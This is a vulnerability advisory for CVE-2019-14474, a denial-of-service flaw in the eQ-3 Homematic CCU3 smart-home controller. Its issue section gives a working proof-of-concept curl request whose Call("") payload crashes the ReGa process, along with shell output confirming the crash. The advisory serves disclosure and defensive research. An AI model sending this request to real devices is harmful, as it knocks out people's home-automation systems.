CVE-2019-14474 eQ-3 Homematic CCU3 has Improper Input Validation in function 'Call()' of ReGa core logic process, resulting in the ability to start a Denial of Service. Due to Improper Authorization an attacker can obtain a session ID from CVE-2019-9583 or a valid guest/user/admin account can start this attack too

Overview

  • CVE: CVE-2019-14474
  • Author: psytester
  • Title: eQ-3 Homematic CCU3 has Improper Input Validation in function ‘Call()’ of ReGa core logic process, resulting in the ability to start a Denial of Service. Due to Improper Authorization an attacker can obtain a session ID from CVE-2019-9583 or a valid guest/user/admin account can start this attack too
  • Vulnerability Type: CWE-20: Improper Input Validation
  • CVSSv3 Base Score: 7.5
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • Publishing Date: 03.08.2019
  • Updated: –
  • Vendor: eQ-3 AG
  • Product: Homematic CCU3
  • Vendor contacted: 08.05.2019
  • Vendor confirmation: N.A.
  • Vendor patch: N.A.
  • Vendor Reference: N.A.
  • Affected Firmware version of CCU3: 3.41.11, 3.43.16, 3.45.5, 3.45.7, 3.47.10, 3.47.15 tested

Background

From vendor’s website for CCU3:
The Central Control Unit CCU3 is the central element for local control of the Homematic IP smart home system. It represents the next generation of our proven Homematic Central Control Units CCU1 and CCU2. Operation via the Central Control Unit CCU3 can be used alternatively to the Homematic IP Access Point. While the Access Point establishes the connection to the free Homematic IP cloud and enables operation of the smart home system via a smartphone app, the Central Control Unit CCU3 works locally via a browser-based web interface (WebUI). Thanks to local configuration and operation as well as the option to create direct device connections, reliable and fail-proof operation of the smart home system is guaranteed at all times – even in the event of Internet failures.
[….]

Past eQ-3 press release about taking security updates seriously (in German only):
[…]
eQ-3 ist es wichtig, dass auch solche Lücken geschlossen werden, die für die meisten Installationen keine Rolle spielen.
[…]
Obwohl nur Nutzer betroffen sind, die gegen Sicherheitshinweise von eQ-3 verstoßen oder seit mehreren Jahren keine Sicherheitsupdates installiert haben, gibt eQ-3 solchen Fällen hohe Priorität und behebt entsprechende Sicherheitslücken schnellstmöglich nach Bekanntwerden in neuen Software-Versionen und Hotfixes.
[…]

Issue Description

While analyzing the CCU web interface based on given page objects and the WebUI calls behind in browser developer console, an Improper Input Validation vulnerability has been identified. It can be exploited in order to start a Denial of Service of the ReGa core logic process. This vulnerability can be exploited by unauthenticated attackers with access to the web interface with obtaining a SessionID from CVE-2019-9583 and by authenticated users too.

First get a SessionID from any page detected by CVE-2019-9583 or login as valid user.

On shell console verify the ReGa process PID:

# ps -afe | grep ReGa
20956 root      0:00 /bin/ReGaHss.normal -f /etc/rega.conf -l 2
20998 root      0:00 grep ReGa

Send this POST request with a Call(""), means double quotation marks without content and your SessionID:
curl -X POST -i 'http://1.2.3.4/esp/exec.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[Call("")]]></prototypejs>'

This results into HTTP 500 Internal Server Error

On shell console you can verify that the ReGa process has been died and the CCU does not longer work:

# ps -afe | grep ReGa
21019 root      0:00 grep ReGa

CVE

CVE-2019-14474

CVSSv3 Base Score

CVSSv3 Base Score: 7.5

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Credit

psytester

Not owning an original CCU2 or CCU3, but you want to analyze the CCU ‘for free’?
You can download
piVCCU for running the original CCU3 Firmware in lxc container on RaspberryPi
RaspberryMatic for running the opensource OCCU based release on different boards

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on August 3, 2019